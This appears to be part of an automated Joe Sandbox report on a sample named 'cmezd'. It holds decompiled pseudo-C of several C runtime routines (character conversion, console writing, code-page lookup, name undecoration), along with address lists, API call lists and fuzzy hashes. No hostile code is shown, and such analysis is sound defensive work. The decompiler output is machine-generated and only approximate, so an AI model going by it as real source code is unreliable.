				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E0136F1C0(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E0136D54E(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E0136777A(GetLastError());
									_t20 =  *((intOrPtr*)(E013676C8()));
								}
								L14:
								return _t20;
							}
							_t20 = E0136D0ED(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0136777A(GetLastError());
						return  *((intOrPtr*)(E013676C8()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E0136D0ED(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E0136D083(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











                                                                                              0x0136d579
                                                                                              0x0136d57e
                                                                                              0x0136d59c
                                                                                              0x0136d59e
                                                                                              0x0136d5a1
                                                                                              0x0136d5ca
                                                                                              0x0136d5d2
                                                                                              0x0136d5d4
                                                                                              0x0136d5ed
                                                                                              0x0136d5f0
                                                                                              0x0136d5f3
                                                                                              0x0136d601
                                                                                              0x0136d60e
                                                                                              0x0136d613
                                                                                              0x0136d615
                                                                                              0x0136d62e
                                                                                              0x0136d631
                                                                                              0x0136d631
                                                                                              0x0136d617
                                                                                              0x0136d61e
                                                                                              0x0136d629
                                                                                              0x0136d629
                                                                                              0x0136d633
                                                                                              0x00000000
                                                                                              0x0136d633
                                                                                              0x0136d5f8
                                                                                              0x0136d5fd
                                                                                              0x0136d5ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d5ff
                                                                                              0x0136d5dd
                                                                                              0x00000000
                                                                                              0x0136d5e8
                                                                                              0x0136d5a3
                                                                                              0x0136d5a6
                                                                                              0x0136d5a9
                                                                                              0x0136d5b8
                                                                                              0x0136d5bb
                                                                                              0x0136d592
                                                                                              0x0136d592
                                                                                              0x00000000
                                                                                              0x0136d595
                                                                                              0x0136d5af
                                                                                              0x0136d5b4
                                                                                              0x0136d5b6
                                                                                              0x0136d637
                                                                                              0x0136d637
                                                                                              0x00000000
                                                                                              0x0136d5b6
                                                                                              0x0136d580
                                                                                              0x0136d585
                                                                                              0x0136d58a
                                                                                              0x0136d58c
                                                                                              0x0136d58f
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0136F1C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,013843B7,?,00000000,-00000008), ref: 0136F26C
                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0136D981,?,?,?,00000000), ref: 0136D5D6
                                                                                              • __dosmaperr.LIBCMT ref: 0136D5DD
                                                                                              • GetLastError.KERNEL32(00000000,0136D981,?,?,00000000,?,?,?,00000000,00000000,?,0136D981,?,?,?,00000000), ref: 0136D617
                                                                                              • __dosmaperr.LIBCMT ref: 0136D61E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              • Opcode ID: 5453ea1e47215f4d0c10a8fb1a9031bf81ae672340269158ad69c3f27f97cb9d
                                                                                              • Instruction ID: b4827511d3a59b3c39a3a84e3a5f0bc6c34a5a36652283e62726e61e8254b0c7
                                                                                              • Opcode Fuzzy Hash: 5453ea1e47215f4d0c10a8fb1a9031bf81ae672340269158ad69c3f27f97cb9d
                                                                                              • Instruction Fuzzy Hash: 1F21CF71700206AFDB21AFE9D88086AB7ADFF5537C780C418E999D7A58D735EC008BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0138FD7B Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0138FD7B(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x139eab0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0138FDEF();
					E0138FDD0();
					_t13 = WriteConsoleW( *0x139eab0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                              0x0138fd98
                                                                                              0x0138fd9c
                                                                                              0x0138fda9
                                                                                              0x0138fdae
                                                                                              0x0138fdc9
                                                                                              0x0138fdc9
                                                                                              0x0138fdcf

                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000), ref: 0138FD92
                                                                                              • GetLastError.KERNEL32(?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000,?,?,?,013847A9,?), ref: 0138FD9E
                                                                                                • Part of subcall function 0138FDEF: CloseHandle.KERNEL32(FFFFFFFE,0138FDAE,?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000,?,?), ref: 0138FDFF
                                                                                              • ___initconout.LIBCMT ref: 0138FDAE
                                                                                                • Part of subcall function 0138FDD0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0138FD6C,0138A55F,?,?,01384E5E,?,?,00000000,?), ref: 0138FDE3
                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000,?), ref: 0138FDC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: 207520196e53cc3d9818917a11430545a136c1a4656ebf105e96e466e3be82d5
                                                                                              • Instruction ID: 1932d042706fd896d491e6cde9473c7a7650264f133be33e431e30fdee6f0287
                                                                                              • Opcode Fuzzy Hash: 207520196e53cc3d9818917a11430545a136c1a4656ebf105e96e466e3be82d5
                                                                                              • Instruction Fuzzy Hash: 79F01C36100256FBCF223FA5DC489993F2AFF083A8F454010FE2995168C632C924DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01368EB1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 60%
                                                                                              			E01368EB1(void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr _v0;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v36;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t36;
				short* _t37;
				intOrPtr* _t38;
				signed int _t40;
				intOrPtr* _t41;
				signed short _t42;
				signed short* _t45;
				intOrPtr _t48;
				void* _t50;
				void* _t66;
				void* _t70;
				void* _t71;
				intOrPtr* _t80;
				short* _t83;
				signed int _t86;
				void* _t87;
				intOrPtr* _t89;
				intOrPtr* _t93;
				signed int _t95;
				signed int _t106;
				void* _t107;
				signed int _t109;
				intOrPtr* _t111;
				intOrPtr _t113;
				void* _t114;
				void* _t116;
				intOrPtr* _t117;
				signed short _t119;
				signed int _t120;
				void* _t124;
				void* _t125;

				_push(_t87);
				_push(_t87);
				_push(_t116);
				_t111 = _a4;
				_t36 = E0136373A(_t87, __edx, _t116);
				_t106 = 0;
				_v12 = 0;
				_t3 = _t36 + 0x50; // 0x50
				_t117 = _t3;
				_t4 = _t117 + 0x250; // 0x2a0
				_t37 = _t4;
				 *((intOrPtr*)(_t117 + 8)) = 0;
				 *_t37 = 0;
				_t6 = _t117 + 4; // 0x54
				_t80 = _t6;
				_v8 = _t37;
				_t89 = _t111;
				_t38 = _t111 + 0x80;
				 *_t117 = _t111;
				 *_t80 = _t38;
				if( *_t38 != 0) {
					_push(_t80);
					_push(0x16);
					_push(0x1395890);
					L40();
					_t89 =  *_t117;
					_t124 = _t124 + 0xc;
					_t106 = 0;
				}
				_push(_t117);
				if( *_t89 == _t106) {
					E013695AA(_t80, _t89);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t80)) == _t106) {
						E01369492();
					} else {
						E01369119(_t89);
					}
					if( *((intOrPtr*)(_t117 + 8)) == 0) {
						_push(_t117);
						_push(0x40);
						_push(0x1395580);
						L40();
						_t124 = _t124 + 0xc;
						if(0 != 0) {
							_push(_t117);
							if( *((intOrPtr*)( *_t80)) == 0) {
								E01369492();
							} else {
								E01369119(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t117 + 8)) == 0) {
					L37:
					_t40 = 0;
					__eflags = 0;
					goto L38;
				} else {
					_t41 = _t111 + 0x100;
					if( *_t111 != 0 ||  *_t41 != 0) {
						_t42 = E01369631(_t41, _t117);
					} else {
						_t42 = GetACP();
					}
					_t119 = _t42;
					if(_t119 == 0 || _t119 == 0xfde8 || IsValidCodePage(_t119 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t45 = _a8;
						if(_t45 != 0) {
							 *_t45 = _t119;
						}
						_t113 = _a12;
						if(_t113 == 0) {
							L36:
							_t40 = 1;
							L38:
							return _t40;
						} else {
							_t93 = _v8;
							_t15 = _t113 + 0x120; // 0xd0
							_t83 = _t15;
							 *_t83 = 0;
							_t107 = _t93 + 2;
							do {
								_t48 =  *_t93;
								_t93 = _t93 + 2;
							} while (_t48 != _v12);
							_t95 = _t93 - _t107 >> 1;
							_push(_t95 + 1);
							_t50 = E01367AF6(_t95, _t83, 0x55, _v8);
							_t125 = _t124 + 0x10;
							if(_t50 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E01364C6E();
								asm("int3");
								_push(_t95);
								_push(_t119);
								_t120 = _v36;
								_push(_t113);
								_t109 = 1;
								_t114 = 0;
								__eflags = _t120;
								if(_t120 >= 0) {
									_push(_t83);
									while(1) {
										__eflags = _t109;
										if(_t109 == 0) {
											break;
										}
										asm("cdq");
										_t86 = _t114 + _t120 - _t109 >> 1;
										_v12 = _t86 * 0xc;
										_t109 = E0138661C( *_a8,  *((intOrPtr*)(_t86 * 0xc + _v0)));
										__eflags = _t109;
										if(__eflags != 0) {
											if(__eflags >= 0) {
												_t33 = _t86 + 1; // 0x1
												_t114 = _t33;
											} else {
												_t32 = _t86 - 1; // -1
												_t120 = _t32;
											}
										} else {
											 *_a8 = _v12 + _v0 + 4;
										}
										__eflags = _t114 - _t120;
										if(_t114 <= _t120) {
											continue;
										}
										break;
									}
								}
								__eflags = _t109;
								_t35 = _t109 == 0;
								__eflags = _t35;
								return 0 | _t35;
							} else {
								if(E01362890(_t83, 0x1001, _t113, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t113 + 0x80; // 0x30
									_t83 = _t20;
									_t21 = _t113 + 0x120; // 0xd0
									if(E01362890(_t21, 0x1002, _t83, 0x40) == 0) {
										goto L37;
									} else {
										_t66 = E0138656C(_t83, 0x5f);
										_pop(_t95);
										if(_t66 != 0) {
											L31:
											_t22 = _t113 + 0x120; // 0xd0
											if(E01362890(_t22, 7, _t83, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_t71 = E0138656C(_t83, 0x2e);
											_pop(_t95);
											if(_t71 == 0) {
												L32:
												_t113 = _t113 + 0x100;
												if(_t119 != 0xfde9) {
													E0137033D(_t95, _t119, _t113, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t70 = E01367AF6(_t95, _t113, 0x10, L"utf8");
													_t125 = _t125 + 0x10;
													if(_t70 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}










































                                                                                              0x01368eb6
                                                                                              0x01368eb7
                                                                                              0x01368eb9
                                                                                              0x01368ebb
                                                                                              0x01368ebe
                                                                                              0x01368ec5
                                                                                              0x01368ec7
                                                                                              0x01368eca
                                                                                              0x01368eca
                                                                                              0x01368ecd
                                                                                              0x01368ecd
                                                                                              0x01368ed3
                                                                                              0x01368ed6
                                                                                              0x01368ed9
                                                                                              0x01368ed9
                                                                                              0x01368edc
                                                                                              0x01368edf
                                                                                              0x01368ee1
                                                                                              0x01368ee7
                                                                                              0x01368ee9
                                                                                              0x01368eee
                                                                                              0x01368ef0
                                                                                              0x01368ef1
                                                                                              0x01368ef3
                                                                                              0x01368ef8
                                                                                              0x01368efd
                                                                                              0x01368eff
                                                                                              0x01368f02
                                                                                              0x01368f02
                                                                                              0x01368f04
                                                                                              0x01368f08
                                                                                              0x01368f51
                                                                                              0x00000000
                                                                                              0x01368f0a
                                                                                              0x01368f0f
                                                                                              0x01368f18
                                                                                              0x01368f11
                                                                                              0x01368f11
                                                                                              0x01368f11
                                                                                              0x01368f23
                                                                                              0x01368f25
                                                                                              0x01368f26
                                                                                              0x01368f28
                                                                                              0x01368f2d
                                                                                              0x01368f32
                                                                                              0x01368f37
                                                                                              0x01368f3d
                                                                                              0x01368f41
                                                                                              0x01368f4a
                                                                                              0x01368f43
                                                                                              0x01368f43
                                                                                              0x01368f43
                                                                                              0x01368f56
                                                                                              0x01368f56
                                                                                              0x01368f37
                                                                                              0x01368f23
                                                                                              0x01368f5c
                                                                                              0x01369098
                                                                                              0x01369098
                                                                                              0x01369098
                                                                                              0x00000000
                                                                                              0x01368f62
                                                                                              0x01368f62
                                                                                              0x01368f6b
                                                                                              0x01368f7c
                                                                                              0x01368f72
                                                                                              0x01368f72
                                                                                              0x01368f72
                                                                                              0x01368f83
                                                                                              0x01368f87
                                                                                              0x00000000
                                                                                              0x01368fab
                                                                                              0x01368fab
                                                                                              0x01368fb0
                                                                                              0x01368fb2
                                                                                              0x01368fb2
                                                                                              0x01368fb4
                                                                                              0x01368fb9
                                                                                              0x01369093
                                                                                              0x01369095
                                                                                              0x0136909a
                                                                                              0x0136909e
                                                                                              0x01368fbf
                                                                                              0x01368fbf
                                                                                              0x01368fc2
                                                                                              0x01368fc2
                                                                                              0x01368fca
                                                                                              0x01368fcd
                                                                                              0x01368fd0
                                                                                              0x01368fd0
                                                                                              0x01368fd3
                                                                                              0x01368fd6
                                                                                              0x01368fde
                                                                                              0x01368fe3
                                                                                              0x01368fea
                                                                                              0x01368fef
                                                                                              0x01368ff4
                                                                                              0x0136909f
                                                                                              0x013690a1
                                                                                              0x013690a2
                                                                                              0x013690a3
                                                                                              0x013690a4
                                                                                              0x013690a5
                                                                                              0x013690a6
                                                                                              0x013690ab
                                                                                              0x013690b1
                                                                                              0x013690b2
                                                                                              0x013690b3
                                                                                              0x013690b8
                                                                                              0x013690b9
                                                                                              0x013690ba
                                                                                              0x013690bc
                                                                                              0x013690be
                                                                                              0x013690c0
                                                                                              0x013690c1
                                                                                              0x013690c1
                                                                                              0x013690c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013690c8
                                                                                              0x013690d0
                                                                                              0x013690d5
                                                                                              0x013690e5
                                                                                              0x013690e9
                                                                                              0x013690eb
                                                                                              0x013690ff
                                                                                              0x01369106
                                                                                              0x01369106
                                                                                              0x01369101
                                                                                              0x01369101
                                                                                              0x01369101
                                                                                              0x01369101
                                                                                              0x013690ed
                                                                                              0x013690fb
                                                                                              0x013690fb
                                                                                              0x01369109
                                                                                              0x0136910b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136910b
                                                                                              0x0136910d
                                                                                              0x01369110
                                                                                              0x01369113
                                                                                              0x01369113
                                                                                              0x01369118
                                                                                              0x01368ffa
                                                                                              0x0136900a
                                                                                              0x00000000
                                                                                              0x01369010
                                                                                              0x01369012
                                                                                              0x01369012
                                                                                              0x0136901e
                                                                                              0x0136902c
                                                                                              0x00000000
                                                                                              0x0136902e
                                                                                              0x01369031
                                                                                              0x01369037
                                                                                              0x0136903a
                                                                                              0x0136904a
                                                                                              0x0136904f
                                                                                              0x0136905d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136903c
                                                                                              0x0136903f
                                                                                              0x01369045
                                                                                              0x01369048
                                                                                              0x0136905f
                                                                                              0x0136905f
                                                                                              0x0136906b
                                                                                              0x0136908b
                                                                                              0x00000000
                                                                                              0x0136906d
                                                                                              0x0136906d
                                                                                              0x01369077
                                                                                              0x0136907c
                                                                                              0x01369081
                                                                                              0x00000000
                                                                                              0x01369083
                                                                                              0x00000000
                                                                                              0x01369083
                                                                                              0x01369081
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369048
                                                                                              0x0136903a
                                                                                              0x0136902c
                                                                                              0x0136900a
                                                                                              0x01368ff4
                                                                                              0x01368fb9
                                                                                              0x01368f87

                                                                                              APIs
                                                                                                • Part of subcall function 0136373A: GetLastError.KERNEL32(?,00000008,0136545D), ref: 0136373E
                                                                                                • Part of subcall function 0136373A: SetLastError.KERNEL32(00000000,00000000,00000007,000000FF), ref: 013637E0
                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,01355BBC,?,?,?,00000055,?,-00000050,?,?,?), ref: 01368F72
                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,01355BBC,?,?,?,00000055,?,-00000050,?,?), ref: 01368F9D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                              • String ID: utf8
                                                                                              • API String ID: 943130320-905460609
                                                                                              • Opcode ID: 8f66c18ad203f5bada82108997f4e62b13a7930918e9c458f50aa5ac8367e6a6
                                                                                              • Instruction ID: 152a482f918bb68674d604e7299560d365330a8302dab7b8bc55c35a7ca75522
                                                                                              • Opcode Fuzzy Hash: 8f66c18ad203f5bada82108997f4e62b13a7930918e9c458f50aa5ac8367e6a6
                                                                                              • Instruction Fuzzy Hash: 87512371600302AEEB25AB39DC45BAB77ADAF5870CF04C469EB099B188F6B1D544C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01354485 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 45%
                                                                                              			E01354485(void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				char* _t30;
				char _t32;
				intOrPtr* _t36;
				void* _t37;
				void* _t41;
				void* _t43;
				char _t44;
				intOrPtr* _t47;

				_t43 = __edi;
				_t34 = _a4;
				_t16 =  *_a4;
				if(_t16 != 0) {
					return _t16;
				}
				_t32 = 0;
				_t47 = E0135B461(0, _t34 + 5, 0, 0x1354583, L0135459C, 0x2800);
				if(_t47 == 0) {
					L13:
					E0135B2EA(_t47);
					return _t32;
				}
				_t36 = _t47;
				_t3 = _t36 + 1; // 0x1
				_t41 = _t3;
				do {
					_t21 =  *_t36;
					_t36 = _t36 + 1;
				} while (_t21 != 0);
				_t37 = _t36 - _t41;
				if(_t37 == 0) {
					L8:
					_t5 = _t37 + 1; // 0x1
					_t22 = _t5;
					_v12 = _t22;
					_push(_t43);
					_push(_t22 + 4);
					_t44 = E0135B305();
					if(_t44 != 0) {
						_t8 = _t44 + 4; // 0x4
						_v16 = _t44;
						_v8 = _t8;
						 *_t44 = _t32;
						E0135B310(_t8, _v12, _t47);
						asm("lock cmpxchg [edx], ecx");
						if(0 == 0) {
							_t44 = _t32;
							__imp__InterlockedPushEntrySList(_a8, _v16);
							_t32 = _v8;
						} else {
							_t32 = 0;
						}
					}
					E0135B2EA(_t44);
					goto L13;
				}
				_t4 = _t47 - 1; // -1
				_t30 = _t4 + _t37;
				while( *_t30 == 0x20) {
					 *_t30 = _t32;
					_t30 = _t30 - 1;
					_t37 = _t37 - 1;
					if(_t37 != 0) {
						continue;
					}
					goto L8;
				}
				goto L8;
			}

















                                                                                              0x01354485
                                                                                              0x01354488
                                                                                              0x0135448e
                                                                                              0x01354493
                                                                                              0x0135454a
                                                                                              0x0135454a
                                                                                              0x013544aa
                                                                                              0x013544b7
                                                                                              0x013544be
                                                                                              0x0135453e
                                                                                              0x0135453f
                                                                                              0x00000000
                                                                                              0x01354548
                                                                                              0x013544c0
                                                                                              0x013544c2
                                                                                              0x013544c2
                                                                                              0x013544c5
                                                                                              0x013544c5
                                                                                              0x013544c7
                                                                                              0x013544c8
                                                                                              0x013544cc
                                                                                              0x013544ce
                                                                                              0x013544e2
                                                                                              0x013544e2
                                                                                              0x013544e2
                                                                                              0x013544e5
                                                                                              0x013544eb
                                                                                              0x013544ec
                                                                                              0x013544f2
                                                                                              0x013544f7
                                                                                              0x013544fd
                                                                                              0x01354500
                                                                                              0x01354504
                                                                                              0x01354507
                                                                                              0x01354509
                                                                                              0x01354519
                                                                                              0x0135451f
                                                                                              0x01354528
                                                                                              0x0135452d
                                                                                              0x01354533
                                                                                              0x01354521
                                                                                              0x01354521
                                                                                              0x01354521
                                                                                              0x0135451f
                                                                                              0x01354537
                                                                                              0x00000000
                                                                                              0x0135453d
                                                                                              0x013544d0
                                                                                              0x013544d3
                                                                                              0x013544d5
                                                                                              0x013544da
                                                                                              0x013544dc
                                                                                              0x013544dd
                                                                                              0x013544e0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013544e0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • ___unDName.LIBVCRUNTIME ref: 013544B2
                                                                                                • Part of subcall function 0135B461: ___unDNameEx.LIBVCRUNTIME ref: 0135B47A
                                                                                              • InterlockedPushEntrySList.KERNEL32(?,?), ref: 0135452D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name___un$EntryInterlockedListPush
                                                                                              • String ID: Im
                                                                                              • API String ID: 723550680-4136205621
                                                                                              • Opcode ID: 31443d59a8216adc4113e7113cbb38f71f93d2202ac7d377e1dba337f4603817
                                                                                              • Instruction ID: 529eb67684f4633b782b922e15e460ac041f2180eee72fa5dc66f6c3a3bb612f
                                                                                              • Opcode Fuzzy Hash: 31443d59a8216adc4113e7113cbb38f71f93d2202ac7d377e1dba337f4603817
                                                                                              • Instruction Fuzzy Hash: A5210771500209EFDB699F6CDC40D6EBFA9EF45A5CB24446CEC05AB206FB32DA45C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135D3C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E0135D3C7(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t21;
				char* _t24;
				intOrPtr* _t25;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				intOrPtr* _t43;

				_t42 = __edx;
				_t34 =  *0x13a0b18; // 0x0
				_t21 =  *_t34;
				if(_t21 != 0) {
					if(_t21 < 0x30 || _t21 > 0x39) {
						E0135D1E0(_t42,  &_v20);
						_t24 =  *0x13a0b18; // 0x0
						_pop(_t35);
						if(_v12 == 0) {
							L12:
							if( *_t24 != 0) {
								_t36 = 0;
								_v8 = 2;
								_v12 = 0;
								_t43 =  &_v12;
							} else {
								_t43 = E0135B826( &_v12, 1);
								_t36 =  *_t43;
							}
							_t25 = _a4;
							 *_t25 = _t36;
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t43 + 4));
							return _t25;
						} else {
							_t24 = _t24 + 1;
							 *0x13a0b18 = _t24;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L12;
								} else {
									_push(_v16);
									E01361D6C(_t35, _a4, _v20);
									goto L9;
								}
							} else {
								_push(_v16);
								E01361D10(_t35, _a4, _v20);
								L9:
								goto L2;
							}
						}
					} else {
						 *0x13a0b18 = _t34 + 1;
						asm("cdq");
						E0135B8AF(_a4, __edx, _t21 - 0x2f, __edx);
						goto L2;
					}
				} else {
					E0135B826(_a4, 1);
					L2:
					return _a4;
				}
			}














                                                                                              0x0135d3c7
                                                                                              0x0135d3ca
                                                                                              0x0135d3d3
                                                                                              0x0135d3d7
                                                                                              0x0135d3ea
                                                                                              0x0135d40e
                                                                                              0x0135d417
                                                                                              0x0135d41c
                                                                                              0x0135d41d
                                                                                              0x0135d454
                                                                                              0x0135d457
                                                                                              0x0135d469
                                                                                              0x0135d46b
                                                                                              0x0135d472
                                                                                              0x0135d475
                                                                                              0x0135d459
                                                                                              0x0135d463
                                                                                              0x0135d465
                                                                                              0x0135d465
                                                                                              0x0135d478
                                                                                              0x0135d47b
                                                                                              0x0135d480
                                                                                              0x0135d484
                                                                                              0x0135d41f
                                                                                              0x0135d41f
                                                                                              0x0135d424
                                                                                              0x0135d429
                                                                                              0x0135d442
                                                                                              0x00000000
                                                                                              0x0135d444
                                                                                              0x0135d444
                                                                                              0x0135d44d
                                                                                              0x00000000
                                                                                              0x0135d44d
                                                                                              0x0135d42b
                                                                                              0x0135d42b
                                                                                              0x0135d434
                                                                                              0x0135d439
                                                                                              0x00000000
                                                                                              0x0135d439
                                                                                              0x0135d429
                                                                                              0x0135d3f0
                                                                                              0x0135d3f7
                                                                                              0x0135d400
                                                                                              0x0135d403
                                                                                              0x00000000
                                                                                              0x0135d403
                                                                                              0x0135d3d9
                                                                                              0x0135d3de
                                                                                              0x0135d3e3
                                                                                              0x0135d3e7
                                                                                              0x0135d3e7

